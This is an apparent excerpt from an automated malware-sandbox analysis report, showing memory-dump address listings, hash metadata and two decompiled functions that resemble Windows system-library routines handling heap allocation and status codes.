                                                              				}
                                                              				L101:
                                                              			}















































































                                                              0x04bb4128
                                                              0x04bb4135
                                                              0x04bb413c
                                                              0x04bb4141
                                                              0x04bb4145
                                                              0x04bb4147
                                                              0x04bb414e
                                                              0x04bb4151
                                                              0x04bb4159
                                                              0x04bb415c
                                                              0x04bb4160
                                                              0x04bb4164
                                                              0x04bb4168
                                                              0x04bb416c
                                                              0x04bb417f
                                                              0x04bb4181
                                                              0x04bb446a
                                                              0x04bb446a
                                                              0x04bb418c
                                                              0x04bb4195
                                                              0x04bb4199
                                                              0x04bb4432
                                                              0x04bb4439
                                                              0x04bb443d
                                                              0x04bb4442
                                                              0x04bb4447
                                                              0x00000000
                                                              0x04bb419f
                                                              0x04bb41a3
                                                              0x04bb41b1
                                                              0x04bb41b9
                                                              0x04bb41bd
                                                              0x04bb45db
                                                              0x04bb45db
                                                              0x00000000
                                                              0x04bb41c3
                                                              0x04bb41c3
                                                              0x04bb41ce
                                                              0x04bb41d4
                                                              0x04bfe138
                                                              0x04bfe13e
                                                              0x04bfe169
                                                              0x04bfe16d
                                                              0x04bfe19e
                                                              0x04bfe16f
                                                              0x04bfe16f
                                                              0x04bfe175
                                                              0x04bfe179
                                                              0x04bfe18f
                                                              0x04bfe193
                                                              0x00000000
                                                              0x04bfe199
                                                              0x00000000
                                                              0x04bfe199
                                                              0x04bfe193
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb41da
                                                              0x04bb41da
                                                              0x04bb41df
                                                              0x04bb41e4
                                                              0x04bb41ec
                                                              0x04bb4203
                                                              0x04bb4207
                                                              0x04bfe1fd
                                                              0x04bb4222
                                                              0x04bb4226
                                                              0x04bfe1f3
                                                              0x04bfe1f3
                                                              0x04bb422c
                                                              0x04bb422c
                                                              0x04bb4233
                                                              0x04bfe1ed
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb4239
                                                              0x04bb4239
                                                              0x04bb4239
                                                              0x04bb4239
                                                              0x04bb4233
                                                              0x04bb4226
                                                              0x04bb41ee
                                                              0x04bb41ee
                                                              0x04bb41f4
                                                              0x04bb4575
                                                              0x04bfe1b1
                                                              0x04bfe1b1
                                                              0x00000000
                                                              0x04bb457b
                                                              0x04bb457b
                                                              0x04bb4582
                                                              0x04bfe1ab
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb4588
                                                              0x04bb4588
                                                              0x04bb458c
                                                              0x04bfe1c4
                                                              0x04bfe1c4
                                                              0x00000000
                                                              0x04bb4592
                                                              0x04bb4592
                                                              0x04bb4599
                                                              0x04bfe1be
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb459f
                                                              0x04bb459f
                                                              0x04bb45a3
                                                              0x04bfe1d7
                                                              0x04bfe1e4
                                                              0x00000000
                                                              0x04bb45a9
                                                              0x04bb45a9
                                                              0x04bb45b0
                                                              0x04bfe1d1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb45b6
                                                              0x04bb45b6
                                                              0x04bb45b6
                                                              0x00000000
                                                              0x04bb45b6
                                                              0x04bb45b0
                                                              0x04bb45a3
                                                              0x04bb4599
                                                              0x04bb458c
                                                              0x04bb4582
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb41f4
                                                              0x04bb423e
                                                              0x04bb4241
                                                              0x04bb45c0
                                                              0x04bb45c4
                                                              0x00000000
                                                              0x04bb45ca
                                                              0x04bb45ca
                                                              0x00000000
                                                              0x04bfe207
                                                              0x04bfe20f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb45d1
                                                              0x00000000
                                                              0x00000000
                                                              0x04bb45ca
                                                              0x00000000
                                                              0x04bb4247
                                                              0x04bb4247
                                                              0x04bb4247
                                                              0x04bb4249
                                                              0x04bb4249
                                                              0x04bb4249
                                                              0x04bb4251
                                                              0x04bb4251
                                                              0x04bb4257
                                                              0x04bb425f
                                                              0x04bb426e
                                                              0x04bb4270
                                                              0x04bb427a
                                                              0x04bfe219
                                                              0x04bfe219
                                                              0x04bb4280
                                                              0x04bb4282
                                                              0x04bb4456
                                                              0x04bb45ea
                                                              0x00000000
                                                              0x04bb45f0
                                                              0x04bfe223
                                                              0x00000000
                                                              0x04bfe223
                                                              0x04bb445c
                                                              0x04bb445c
                                                              0x00000000
                                                              0x04bb445c
                                                              0x00000000
                                                              0x04bb4288
                                                              0x04bb428c
                                                              0x04bfe298
                                                              0x04bb4292
                                                              0x04bb4292
                                                              0x04bb429e
                                                              0x04bb42a3
                                                              0x04bb42a7
                                                              0x04bb42ac
                                                              0x04bfe22d
                                                              0x04bb42b2
                                                              0x04bb42b2
                                                              0x04bb42b9
                                                              0x04bb42bc
                                                              0x04bb42c2
                                                              0x04bb42ca
                                                              0x04bb42cd
                                                              0x04bb42cd
                                                              0x04bb42d4
                                                              0x04bb433f
                                                              0x04bb433f
                                                              0x04bb42d6
                                                              0x04bb42d6
                                                              0x04bb42d9
                                                              0x04bb42dd
                                                              0x04bb42eb
                                                              0x04bfe23a
                                                              0x04bb42f1
                                                              0x04bb4305
                                                              0x04bb430d
                                                              0x04bb4315
                                                              0x04bb4318
                                                              0x04bb431f
                                                              0x04bb4322
                                                              0x04bb432e
                                                              0x04bb433b
                                                              0x04bb433b
                                                              0x00000000
                                                              0x04bb432e
                                                              0x04bb42eb
                                                              0x04bb434c
                                                              0x04bb434e
                                                              0x04bb4352
                                                              0x04bb4359
                                                              0x04bb435e
                                                              0x04bb4361
                                                              0x04bb436e
                                                              0x04bb438a
                                                              0x04bb438e
                                                              0x04bb4396
                                                              0x04bb439e
                                                              0x04bb43a1
                                                              0x04bb43ad
                                                              0x04bb43bb
                                                              0x04bb43bb
                                                              0x04bb43ad
                                                              0x04bb436e
                                                              0x04bb43bf
                                                              0x04bb43c5
                                                              0x04bb4463
                                                              0x04bb4463
                                                              0x04bb43ce
                                                              0x04bb43d5
                                                              0x04bb43d9
                                                              0x04bb43df
                                                              0x04bb4475
                                                              0x04bb4479
                                                              0x04bb4491
                                                              0x04bb4491
                                                              0x04bb4479
                                                              0x04bb43e5
                                                              0x04bb43eb
                                                              0x04bb43f4
                                                              0x04bb43f6
                                                              0x04bb43f9
                                                              0x04bb43fc
                                                              0x04bb43ff
                                                              0x04bb44e8
                                                              0x04bb44ed
                                                              0x04bb44f3
                                                              0x04bfe247
                                                              0x00000000
                                                              0x04bb44f9
                                                              0x04bb4504
                                                              0x04bb4508
                                                              0x04bb450f
                                                              0x04bfe269
                                                              0x00000000
                                                              0x04bb4515
                                                              0x04bb4519
                                                              0x04bb4531
                                                              0x04bb4534
                                                              0x04bb4537
                                                              0x04bb453e
                                                              0x04bb4541
                                                              0x04bb454a
                                                              0x04bfe255
                                                              0x04bfe255
                                                              0x04bfe25b
                                                              0x04bfe25e
                                                              0x04bfe261
                                                              0x04bfe261
                                                              0x04bb4555
                                                              0x04bb4559
                                                              0x04bb455d
                                                              0x04bfe26d
                                                              0x04bfe270
                                                              0x04bfe274
                                                              0x04bfe27a
                                                              0x04bfe27d
                                                              0x04bfe28e
                                                              0x04bfe28e
                                                              0x04bb4563
                                                              0x04bb4563
                                                              0x04bb4569
                                                              0x04bb4569
                                                              0x00000000
                                                              0x04bb455d
                                                              0x04bb450f
                                                              0x00000000
                                                              0x04bb44f3
                                                              0x04bb43ff
                                                              0x04bb4405
                                                              0x04bb4405
                                                              0x04bb4405
                                                              0x04bb42ac
                                                              0x04bb428c
                                                              0x04bb4282
                                                              0x04bb4407
                                                              0x04bb440d
                                                              0x04bfe2af
                                                              0x04bfe2af
                                                              0x04bb4413
                                                              0x04bb4413
                                                              0x00000000
                                                              0x04bb41d4
                                                              0x00000000
                                                              0x04bb41c3
                                                              0x04bb41bd
                                                              0x04bb4415
                                                              0x04bb4415
                                                              0x04bb4416
                                                              0x04bb4417
                                                              0x04bb4429
                                                              0x04bb416e
                                                              0x04bb416e
                                                              0x04bb4175
                                                              0x04bb4498
                                                              0x04bb449f
                                                              0x04bfe12d
                                                              0x00000000
                                                              0x04bfe133
                                                              0x00000000
                                                              0x04bfe133
                                                              0x04bb44a5
                                                              0x04bb44a5
                                                              0x04bb44aa
                                                              0x00000000
                                                              0x04bb44bb
                                                              0x04bb44ca
                                                              0x04bb44d6
                                                              0x04bb44d7
                                                              0x04bb44d8
                                                              0x04bb44e3
                                                              0x04bb44e3
                                                              0x04bb44aa
                                                              0x04bb417b
                                                              0x04bb417b
                                                              0x04bb417b
                                                              0x00000000
                                                              0x04bb417b
                                                              0x04bb4175
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8bba3125d218a29d9b48f5d42154de509c1682bba028bfee4457564e617044e
                                                              • Instruction ID: ac6fcc8bcd0eb42716bbfc15c81ba10cd9f33b9f22d2a9266f2caa4d92cd25b2
                                                              • Opcode Fuzzy Hash: f8bba3125d218a29d9b48f5d42154de509c1682bba028bfee4457564e617044e
                                                              • Instruction Fuzzy Hash: FBF16E706082118FC714CF59C880A7AB7E1FF88708F0489AEF5CACB261E774E955DB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04BC513A(intOrPtr __ecx, void* __edx) {
                                                              				signed int _v8;
                                                              				signed char _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				char _v28;
                                                              				signed int _v32;
                                                              				signed int _v36;
                                                              				signed int _v40;
                                                              				intOrPtr _v44;
                                                              				intOrPtr _v48;
                                                              				char _v63;
                                                              				char _v64;
                                                              				signed int _v72;
                                                              				signed int _v76;
                                                              				signed int _v80;
                                                              				signed int _v84;
                                                              				signed int _v88;
                                                              				signed char* _v92;
                                                              				signed int _v100;
                                                              				signed int _v104;
                                                              				char _v105;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t157;
                                                              				signed int _t159;
                                                              				signed int _t160;
                                                              				unsigned int* _t161;
                                                              				intOrPtr _t165;
                                                              				signed int _t172;
                                                              				signed char* _t181;
                                                              				intOrPtr _t189;
                                                              				intOrPtr* _t200;
                                                              				signed int _t202;
                                                              				signed int _t203;
                                                              				char _t204;
                                                              				signed int _t207;
                                                              				signed int _t208;
                                                              				void* _t209;
                                                              				intOrPtr _t210;
                                                              				signed int _t212;
                                                              				signed int _t214;
                                                              				signed int _t221;
                                                              				signed int _t222;
                                                              				signed int _t226;
                                                              				intOrPtr* _t232;
                                                              				signed int _t233;
                                                              				signed int _t234;
                                                              				intOrPtr _t237;
                                                              				intOrPtr _t238;
                                                              				intOrPtr _t240;
                                                              				void* _t245;
                                                              				signed int _t246;
                                                              				signed int _t247;
                                                              				void* _t248;
                                                              				void* _t251;
                                                              				void* _t252;
                                                              				signed int _t253;
                                                              				signed int _t255;
                                                              				signed int _t256;
                                                              
                                                              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                              				_v8 =  *0x4c8d360 ^ _t255;
                                                              				_v32 = _v32 & 0x00000000;
                                                              				_t251 = __edx;
                                                              				_t237 = __ecx;
                                                              				_t212 = 6;
                                                              				_t245 =  &_v84;
                                                              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                              				_v48 = __ecx;
                                                              				_v36 = _t207;
                                                              				_t157 = memset(_t245, 0, _t212 << 2);
                                                              				_t256 = _t255 + 0xc;
                                                              				_t246 = _t245 + _t212;
                                                              				if(_t207 == 2) {
                                                              					_t247 =  *(_t237 + 0x60);
                                                              					_t208 =  *(_t237 + 0x64);
                                                              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                              					_v104 = _t159;
                                                              					_v76 = _t159;
                                                              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                              					_v100 = _t160;
                                                              					_v72 = _t160;
                                                              					L19:
                                                              					_v80 = _t208;
                                                              					_v84 = _t247;
                                                              					L8:
                                                              					_t214 = 0;
                                                              					if( *(_t237 + 0x74) > 0) {
                                                              						_t82 = _t237 + 0x84; // 0x124
                                                              						_t161 = _t82;
                                                              						_v92 = _t161;
                                                              						while( *_t161 >> 0x1f != 0) {
                                                              							_t200 = _v92;
                                                              							if( *_t200 == 0x80000000) {
                                                              								break;
                                                              							}
                                                              							_t214 = _t214 + 1;
                                                              							_t161 = _t200 + 0x10;
                                                              							_v92 = _t161;
                                                              							if(_t214 <  *(_t237 + 0x74)) {
                                                              								continue;
                                                              							}
                                                              							goto L9;
                                                              						}
                                                              						_v88 = _t214 << 4;
                                                              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                              						_t165 = 0;
                                                              						asm("adc eax, [ecx+edx+0x7c]");
                                                              						_v24 = _t165;
                                                              						_v28 = _v40;
                                                              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                              						_t221 = _v40;
                                                              						_v16 =  *_v92;
                                                              						_v32 =  &_v28;
                                                              						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                              							goto L9;
                                                              						}
                                                              						_t240 = _v48;
                                                              						if( *_v92 != 0x80000000) {
                                                              							goto L9;
                                                              						}
                                                              						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                              						_t226 = 0;
                                                              						_t181 = _t251 + 0x66;
                                                              						_v88 = 0;
                                                              						_v92 = _t181;
                                                              						do {
                                                              							if( *((char*)(_t181 - 2)) == 0) {
                                                              								goto L31;
                                                              							}
                                                              							_t226 = _v88;
                                                              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                              								_t181 = E04BDD0F0(1, _t226 + 0x20, 0);
                                                              								_t226 = _v40;
                                                              								 *(_t226 + 8) = _t181;
                                                              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                              								L34:
                                                              								if(_v44 == 0) {
                                                              									goto L9;
                                                              								}
                                                              								_t210 = _v44;
                                                              								_t127 = _t210 + 0x1c; // 0x1c
                                                              								_t249 = _t127;
                                                              								E04BB2280(_t181, _t127);
                                                              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                              									L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                              								}
                                                              								_t189 = L04BB4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                              								if(_t189 != 0) {
                                                              									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                              									 *_t232 = _t232 + 0x10;
                                                              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                              									E04BDF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                              									_t256 = _t256 + 0xc;
                                                              								}
                                                              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                              								E04BAFFB0(_t210, _t249, _t249);
                                                              								_t222 = _v76;
                                                              								_t172 = _v80;
                                                              								_t208 = _v84;
                                                              								_t247 = _v88;
                                                              								L10:
                                                              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                              								_v44 = _t238;
                                                              								if(_t238 != 0) {
                                                              									 *0x4c8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                              									_v44();
                                                              								}
                                                              								_pop(_t248);
                                                              								_pop(_t252);
                                                              								_pop(_t209);
                                                              								return E04BDB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                              							}
                                                              							_t181 = _v92;
                                                              							L31:
                                                              							_t226 = _t226 + 1;
                                                              							_t181 =  &(_t181[0x18]);
                                                              							_v88 = _t226;
                                                              							_v92 = _t181;
                                                              						} while (_t226 < 4);
                                                              						goto L34;
                                                              					}
                                                              					L9:
                                                              					_t172 = _v104;
                                                              					_t222 = _v100;
                                                              					goto L10;
                                                              				}
                                                              				_t247 = _t246 | 0xffffffff;
                                                              				_t208 = _t247;
                                                              				_v84 = _t247;
                                                              				_v80 = _t208;
                                                              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                              					_t233 = _v72;
                                                              					_v105 = _v64;
                                                              					_t202 = _v76;
                                                              				} else {
                                                              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                              					_v105 = 1;
                                                              					if(_v63 <= _t204) {
                                                              						_v63 = _t204;
                                                              					}
                                                              					_t202 = _v76 |  *(_t251 + 0x40);
                                                              					_t233 = _v72 |  *(_t251 + 0x44);
                                                              					_t247 =  *(_t251 + 0x38);
                                                              					_t208 =  *(_t251 + 0x3c);
                                                              					_v76 = _t202;
                                                              					_v72 = _t233;
                                                              					_v84 = _t247;
                                                              					_v80 = _t208;
                                                              				}
                                                              				_v104 = _t202;
                                                              				_v100 = _t233;
                                                              				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                              					_t237 = _v48;
                                                              					_v105 = 1;
                                                              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                              						_t237 = _v48;
                                                              					}
                                                              					_t203 = _t202 |  *(_t251 + 0xb8);
                                                              					_t234 = _t233 |  *(_t251 + 0xbc);
                                                              					_t247 = _t247 &  *(_t251 + 0xb0);
                                                              					_t208 = _t208 &  *(_t251 + 0xb4);
                                                              					_v104 = _t203;
                                                              					_v76 = _t203;
                                                              					_v100 = _t234;
                                                              					_v72 = _t234;
                                                              					_v84 = _t247;
                                                              					_v80 = _t208;
                                                              				}
                                                              				if(_v105 == 0) {
                                                              					_v36 = _v36 & 0x00000000;
                                                              					_t208 = 0;
                                                              					_t247 = 0;
                                                              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                              					goto L19;
                                                              				} else {
                                                              					_v36 = 1;
                                                              					goto L8;
                                                              				}
                                                              			}































































                                                              0x04bc5142
                                                              0x04bc514c
                                                              0x04bc5150
                                                              0x04bc5157
                                                              0x04bc5159
                                                              0x04bc515e
                                                              0x04bc5165
                                                              0x04bc5169
                                                              0x04bc516c
                                                              0x04bc5172
                                                              0x04bc5176
                                                              0x04bc517a
                                                              0x04bc517a
                                                              0x04bc517a
                                                              0x04bc517f
                                                              0x04c06d8b
                                                              0x04c06d8e
                                                              0x04c06d91
                                                              0x04c06d95
                                                              0x04c06d98
                                                              0x04c06d9c
                                                              0x04c06da0
                                                              0x04c06da3
                                                              0x04c06da7
                                                              0x04c06e26
                                                              0x04c06e26
                                                              0x04c06e2a
                                                              0x04bc51f9
                                                              0x04bc51f9
                                                              0x04bc51fe
                                                              0x04c06e33
                                                              0x04c06e33
                                                              0x04c06e39
                                                              0x04c06e3d
                                                              0x04c06e46
                                                              0x04c06e50
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06e52
                                                              0x04c06e53
                                                              0x04c06e56
                                                              0x04c06e5d
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06e5f
                                                              0x04c06e67
                                                              0x04c06e77
                                                              0x04c06e7f
                                                              0x04c06e80
                                                              0x04c06e88
                                                              0x04c06e90
                                                              0x04c06e9f
                                                              0x04c06ea5
                                                              0x04c06ea9
                                                              0x04c06eb1
                                                              0x04c06ebf
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06ecf
                                                              0x04c06ed3
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06edb
                                                              0x04c06ede
                                                              0x04c06ee1
                                                              0x04c06ee8
                                                              0x04c06eeb
                                                              0x04c06eed
                                                              0x04c06ef0
                                                              0x04c06ef4
                                                              0x04c06ef8
                                                              0x04c06efc
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06f0d
                                                              0x04c06f11
                                                              0x04c06f32
                                                              0x04c06f37
                                                              0x04c06f3b
                                                              0x04c06f3e
                                                              0x04c06f41
                                                              0x04c06f46
                                                              0x00000000
                                                              0x00000000
                                                              0x04c06f4c
                                                              0x04c06f50
                                                              0x04c06f50
                                                              0x04c06f54
                                                              0x04c06f62
                                                              0x04c06f65
                                                              0x04c06f6d
                                                              0x04c06f7b
                                                              0x04c06f7b
                                                              0x04c06f93
                                                              0x04c06f98
                                                              0x04c06fa0
                                                              0x04c06fa6
                                                              0x04c06fb3
                                                              0x04c06fb6
                                                              0x04c06fbf
                                                              0x04c06fc1
                                                              0x04c06fd5
                                                              0x04c06fda
                                                              0x04c06fda
                                                              0x04c06fdd
                                                              0x04c06fe2
                                                              0x04c06fe7
                                                              0x04c06feb
                                                              0x04c06fef
                                                              0x04c06ff3
                                                              0x04bc520c
                                                              0x04bc520c
                                                              0x04bc520f
                                                              0x04bc5215
                                                              0x04bc5234
                                                              0x04bc523a
                                                              0x04bc523a
                                                              0x04bc5244
                                                              0x04bc5245
                                                              0x04bc5246
                                                              0x04bc5251
                                                              0x04bc5251
                                                              0x04c06f13
                                                              0x04c06f17
                                                              0x04c06f17
                                                              0x04c06f18
                                                              0x04c06f1b
                                                              0x04c06f1f
                                                              0x04c06f23
                                                              0x00000000
                                                              0x04c06f28
                                                              0x04bc5204
                                                              0x04bc5204
                                                              0x04bc5208
                                                              0x00000000
                                                              0x04bc5208
                                                              0x04bc5185
                                                              0x04bc5188
                                                              0x04bc518a
                                                              0x04bc518e
                                                              0x04bc5195
                                                              0x04c06db1
                                                              0x04c06db5
                                                              0x04c06db9
                                                              0x04bc519b
                                                              0x04bc519b
                                                              0x04bc519e
                                                              0x04bc51a7
                                                              0x04bc51a9
                                                              0x04bc51a9
                                                              0x04bc51b5
                                                              0x04bc51b8
                                                              0x04bc51bb
                                                              0x04bc51be
                                                              0x04bc51c1
                                                              0x04bc51c5
                                                              0x04bc51c9
                                                              0x04bc51cd
                                                              0x04bc51cd
                                                              0x04bc51d8
                                                              0x04bc51dc
                                                              0x04bc51e0
                                                              0x04c06dcc
                                                              0x04c06dd0
                                                              0x04c06dd5
                                                              0x04c06ddd
                                                              0x04c06de1
                                                              0x04c06de1
                                                              0x04c06de5
                                                              0x04c06deb
                                                              0x04c06df1
                                                              0x04c06df7
                                                              0x04c06dfd
                                                              0x04c06e01
                                                              0x04c06e05
                                                              0x04c06e09
                                                              0x04c06e0d
                                                              0x04c06e11
                                                              0x04c06e11
                                                              0x04bc51eb
                                                              0x04c06e1a
                                                              0x04c06e1f
                                                              0x04c06e21
                                                              0x04c06e23
                                                              0x00000000
                                                              0x04bc51f1
                                                              0x04bc51f1
                                                              0x00000000
                                                              0x04bc51f1

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d71ef0efdf106d9d5634af477e4ab655cf3f0e07f0bb6cf1a2e76a01a674cc01
                                                              • Instruction ID: 99ac29172a3dba1d94d023764fd121a8e19ae198022597a57f408e736bda56ca
                                                              • Opcode Fuzzy Hash: d71ef0efdf106d9d5634af477e4ab655cf3f0e07f0bb6cf1a2e76a01a674cc01
                                                              • Instruction Fuzzy Hash: 42C114756083819FD354CF28C480A5AFBF1BF88308F1489ADF8998B392D771E945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 67%
                                                              			E04B9C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                              				signed int _v8;
                                                              				char _v1036;
                                                              				signed int _v1040;
                                                              				char _v1048;
                                                              				signed int _v1052;
                                                              				signed char _v1056;
                                                              				void* _v1058;
                                                              				char _v1060;
                                                              				signed int _v1064;
                                                              				void* _v1068;
                                                              				intOrPtr _v1072;
                                                              				void* _v1084;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t74;
                                                              				intOrPtr _t77;
                                                              				signed int _t78;
                                                              				signed int _t81;
                                                              				void* _t101;
                                                              				signed int _t102;
                                                              				signed int _t107;
                                                              				signed int _t109;
                                                              				signed int _t110;
                                                              				signed char _t111;
                                                              				signed int _t112;
                                                              				signed int _t113;
                                                              				signed int _t114;
                                                              				intOrPtr _t116;
                                                              				void* _t117;
                                                              				char _t118;
                                                              				void* _t120;
                                                              				char _t121;
                                                              				signed int _t122;
                                                              				signed int _t123;
                                                              				signed int _t125;
                                                              
                                                              				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                              				_v8 =  *0x4c8d360 ^ _t125;
                                                              				_t116 = _a4;
                                                              				_v1056 = _a16;
                                                              				_v1040 = _a24;
                                                              				if(E04BA6D30( &_v1048, _a8) < 0) {
                                                              					L4:
                                                              					_pop(_t117);
                                                              					_pop(_t120);
                                                              					_pop(_t101);
                                                              					return E04BDB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                              				}
                                                              				_t70 = _a20;
                                                              				if(_t70 >= 0x3f4) {
                                                              					_t121 = _t70 + 0xc;
                                                              					L19:
                                                              					_t107 =  *( *[fs:0x30] + 0x18);
                                                              					__eflags = _t107;
                                                              					if(_t107 == 0) {
                                                              						L60:
                                                              						_t68 = 0xc0000017;
                                                              						goto L4;
                                                              					}
                                                              					_t72 =  *0x4c87b9c; // 0x0
                                                              					_t74 = L04BB4620(_t107, _t107, _t72 + 0x180000, _t121);
                                                              					_v1064 = _t74;
                                                              					__eflags = _t74;
                                                              					if(_t74 == 0) {
                                                              						goto L60;
                                                              					}
                                                              					_t102 = _t74;
                                                              					_push( &_v1060);
                                                              					_push(_t121);
                                                              					_push(_t74);
                                                              					_push(2);
                                                              					_push( &_v1048);
                                                              					_push(_t116);
                                                              					_t122 = E04BD9650();
                                                              					__eflags = _t122;
                                                              					if(_t122 >= 0) {
                                                              						L7:
                                                              						_t114 = _a12;
                                                              						__eflags = _t114;
                                                              						if(_t114 != 0) {
                                                              							_t77 = _a20;
                                                              							L26:
                                                              							_t109 =  *(_t102 + 4);
                                                              							__eflags = _t109 - 3;
                                                              							if(_t109 == 3) {
                                                              								L55:
                                                              								__eflags = _t114 - _t109;
                                                              								if(_t114 != _t109) {
                                                              									L59:
                                                              									_t122 = 0xc0000024;
                                                              									L15:
                                                              									_t78 = _v1052;
                                                              									__eflags = _t78;
                                                              									if(_t78 != 0) {
                                                              										L04BB77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                              									}
                                                              									_t68 = _t122;
                                                              									goto L4;
                                                              								}
                                                              								_t110 = _v1056;
                                                              								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              								_v1060 = _t118;
                                                              								__eflags = _t110;
                                                              								if(_t110 == 0) {
                                                              									L10:
                                                              									_t122 = 0x80000005;
                                                              									L11:
                                                              									_t81 = _v1040;
                                                              									__eflags = _t81;
                                                              									if(_t81 == 0) {
                                                              										goto L15;
                                                              									}
                                                              									__eflags = _t122;
                                                              									if(_t122 >= 0) {
                                                              										L14:
                                                              										 *_t81 = _t118;
                                                              										goto L15;
                                                              									}
                                                              									__eflags = _t122 - 0x80000005;
                                                              									if(_t122 != 0x80000005) {
                                                              										goto L15;
                                                              									}
                                                              									goto L14;
                                                              								}
                                                              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                              									goto L10;
                                                              								}
                                                              								_push( *((intOrPtr*)(_t102 + 8)));
                                                              								_t59 = _t102 + 0xc; // 0xc
                                                              								_push(_t110);
                                                              								L54:
                                                              								E04BDF3E0();
                                                              								_t125 = _t125 + 0xc;
                                                              								goto L11;
                                                              							}
                                                              							__eflags = _t109 - 7;
                                                              							if(_t109 == 7) {
                                                              								goto L55;
                                                              							}
                                                              							_t118 = 4;
                                                              							__eflags = _t109 - _t118;
                                                              							if(_t109 != _t118) {
                                                              								__eflags = _t109 - 0xb;
                                                              								if(_t109 != 0xb) {
                                                              									__eflags = _t109 - 1;
                                                              									if(_t109 == 1) {
                                                              										__eflags = _t114 - _t118;
                                                              										if(_t114 != _t118) {
                                                              											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                              											_v1060 = _t118;
                                                              											__eflags = _t118 - _t77;
                                                              											if(_t118 > _t77) {
                                                              												goto L10;
                                                              											}
                                                              											_push(_t118);
                                                              											_t56 = _t102 + 0xc; // 0xc
                                                              											_push(_v1056);
                                                              											goto L54;
                                                              										}
